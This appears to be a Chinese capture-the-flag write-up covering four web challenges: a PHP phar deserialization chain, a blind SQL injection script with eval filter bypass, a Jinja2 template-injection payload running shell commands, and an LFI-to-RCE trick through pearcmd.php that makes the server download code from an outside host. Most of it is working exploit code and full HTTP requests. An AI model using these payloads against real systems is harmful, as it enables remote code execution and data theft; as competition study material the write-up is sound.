u1s1这次巅峰极客比赛质量真不错,有一题用到了LFI包含php自带文件从而直接RCE的地方,LFI到RCE的道路被大大的缩短
babyphp2
扫描目录得到源码
[11:00:52] 200 - 68B - /index.php
[11:00:53] 200 - 68B - /index.php/login/
[11:01:33] 200 - 583B - /login.php
[11:03:57] 403 - 335B - /server-status
[11:04:19] 403 - 336B - /server-status/
[11:05:21] 200 - 422B - /upload.php
[11:05:22] 403 - 329B - /upload/
[11:05:41] 301 - 383B - /upload -> http://eci-2ze5jqyhfniloont8y3x.cloudeci1.ichunqiu.com/upload/
[11:06:20] 200 - 4KB - /www.zip
阅读代码发现有上传点和一堆文件操作函数,很容易想到phar反序列化
阅读代码构造反序列化链:dbCtrl::__destruct->User::__toString->Reader::__set
<?php
Class Reader{
public $filename;
public $result;
public function __construct(){
}
}
class User
{
public $id;
public $age=null;
public $nickname=null;
public $backup;
public function __construct(){
$this->backup="/flag";
$this->nickname=new Reader();
}
}
class dbCtrl
{
public $hostname="127.0.0.1";
public $dbuser="p3rh4ps";
public $dbpass="p3rh4ps";
public $database="p3rh4ps";
public $name;
public $password;
public $mysqli;
public $token;
public function __construct(){
$this->token=new User();
}
}
$a = new dbCtrl();
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar,phar伪协议不用phar后缀
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub,只要后面部分为__HALT_COMPILER();
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
compress.zlib://phar://phar.phar/test.txt绕过限制
babyback
对check接口进行测试发现sql在诸如
check.php 过滤了: ",',-,=,;,select
利用\ 来转移引号从而逃脱引号包围: username=aaaa\&password= /sleep(5)%23bbbb存在sql注入
盲注脚本:
import requests
import time
#修改bigger和sqlinj就好
#实现bigger才能使用
def findByDichotomy(begin,end):
max_num=end
while True:
mid=int((begin+end)/2)
if begin==max_num:
return False
if begin==end:
return begin
if end-begin==1:
if bigger(begin):
return end
else:
return begin
if bigger(mid):
begin=mid+1
else:
end=mid
#待求数据大于num
def bigger(num):
return sqlinj(num)
def less(num):
pass
def equal(num):
pass
def sqlinj(num):
burp0_url = "http://eci-2ze91js64coeqpjda9u8.cloudeci1.ichunqiu.com:80/check.php"
burp0_cookies = {"UM_distinctid": "174b11256cb2fd-030f86f83a6db3-333769-240000-174b11256cd6f1", "chkphone": "acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O", "Hm_lvt_2d0601bd28de7d49818249cf35d95943": "1600698604,1601088882", "Hm_lpvt_2d0601bd28de7d49818249cf35d95943": "1601094598", "PHPSESSID": "rctopt4e8mjrphj5dj74futmo7", "__jsluid_h": "16ef3109bf60c11c79ef469f3d7cd07e"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://eci-2ze91js64coeqpjda9u8.cloudeci1.ichunqiu.com", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://eci-2ze91js64coeqpjda9u8.cloudeci1.ichunqiu.com/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"username": "aaaa\\", "password": "or ascii(substr(password,{POS},1))>{GUESS}#bbbb".format(POS=pos,GUESS=num)}
r=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
if "<div class='logo'>密码错误</div>" in r.text:
return True
return False
#admin
#uAreRigHt
result=""
pos=len(result)+1
while True:
num=findByDichotomy(32,128)
if num is False:
print(result)
break
result+=chr(num)
print(result)
pos+=1
账号密码
admin
uAreRigHt
登入后进入新的挑战
eval($command."=false");
过滤:;,",', ,|,`,^,\,;,/,*,(,),&,$,#,f,F
虽然过滤了括号,但是我们并不需要任意命令执行,只要能任意文件读取就好了。
但是无法闭合的语句封住了我们读flag的路。这时候只能去找找eval的特性,翻翻文档,读读实现代码来绕过。
在查找php手册中的eval部分时发现:
关于传入语句有一个神奇的特性
代码不能包含打开/关闭 PHP tags。比如, 'echo "Hi!";' 不能这样传入: '<?php echo "Hi!"; ?>'。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 'echo "In PHP mode!"; ?>In HTML mode!<?php echo "Back in PHP mode!";'。
于是我们构造>?来让=false不会被当成php代码。
虽然引号被禁用了,但是我们可以Heredoc 结构来绕过引号限制,用取反来绕过字符限制
最后的payload:
任意文件包含
POST /admin/ HTTP/1.1
Host: eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1600698604,1601088882; UM_distinctid=174b11256cb2fd-030f86f83a6db3-333769-240000-174b11256cd6f1; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1601100971; PHPSESSID=aabua1gfiqc9s8i13u3iqace72; __jsluid_h=89eac162499bc32092c0474accd770c5
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrD05yt5m
Content-Length: 161
------WebKitFormBoundaryrD05yt5m
Content-Disposition: form-data; name="command"
?><?=include<<<DDDD
.bowerrc
DDDD
?>
------WebKitFormBoundaryrD05yt5m--
读取flag
POST /admin/ HTTP/1.1
Host: eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1600698604,1601088882; UM_distinctid=174b11256cb2fd-030f86f83a6db3-333769-240000-174b11256cd6f1; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1601100971; PHPSESSID=aabua1gfiqc9s8i13u3iqace72; __jsluid_h=89eac162499bc32092c0474accd770c5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
command=%3f%3e%3c%3f%3dinclude%7e%3c%3c%3cDDDD%0d%0a%D0%99%93%9E%98%0d%0aDDDD%0d%0a%3f%3e
babyflask
GET /loged?name=%7B%7B2*2%7D%7D
存在SSTI
模板引擎jinja2
http://eci-2ze3domag0jprtzax0lx.cloudeci1.ichunqiu.com:8888/loged?name={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27_IterationGuard%27%20%}{{%20c.__init__.__globals__[%27__builtins__%27][%27eval%27](%22__import__(%27os%27).popen(%27cat%20/flag%27).read()%22)%20}}{%%20endif%20%}{%%20endfor%20%}
拿flag
MeowWorld
就一个任意文件包含,会在文件名后加一个.php,没啥头绪
后来题目提示register_argc_argv
register_argc_argv TRUE
由于该设置为 TRUE,将总是可以在 CLI SAPI 中访问到 argc(传送给应用程序参数的个数)和 argv(包含有实际参数的数组)。
对于 PHP 4.3.0,在使用 CLI SAPI 时,PHP 变量 $argc 和 $argv 已被注册并且设定了对应的值。而在这之前的版本,这两个变量在 CGI 或者 模块 版本中的建立依赖于将 PHP 的设置选项 register_globals 设为 on。除了版本和 register_globals 设定以外,可以随时通过调用 $_SERVER 或者 $HTTP_SERVER_VARS 来访问它们。例如:$_SERVER['argv']
https://khack40.info/camp-ctf-2015-trolol-web-write-up/
找到一个类似的题目,但是他们是用变量覆盖来执行
阅读pearcmd的代码发现:if (!isset($_SERVER['argv']) && !isset($argv) && !isset($HTTP_SERVER_VARS['argv']))
http://eci-2zeguuukox00jv0u113l.cloudeci1.ichunqiu.com/?list+install+--installroot+/tmp/+http://ccreater.top:60006/install.php++++++++++++++$&f=pearcmd&
利用多个++++++来注释掉多余的部分
http://eci-2zeguuukox00jv0u113l.cloudeci1.ichunqiu.com/?f=/tmp/tmp/pear/download/install
任意命令执行
知识点总结
1: eval虽然不能以<?php开头,但是能用?>结束php模式,之后可以用<?php再次进入php模式
2:包含/usr/local/lib/php/pearcmd.php(通常在php的include_path中)从而RCE,利用条件:
- 可以包含/usr/local/lib/php/下的文件
- 服务器可以出网
payload:url?list+install+--installroot+/tmp/+http://ccreater.top:60006/install.php++++++++++++++$&otherGetParam+include "/usr/local/lib/php/pearcmd.php"
接着包含/tmp/tmp/pear/download/install
发表评论
您还未登录,请先登录。
登录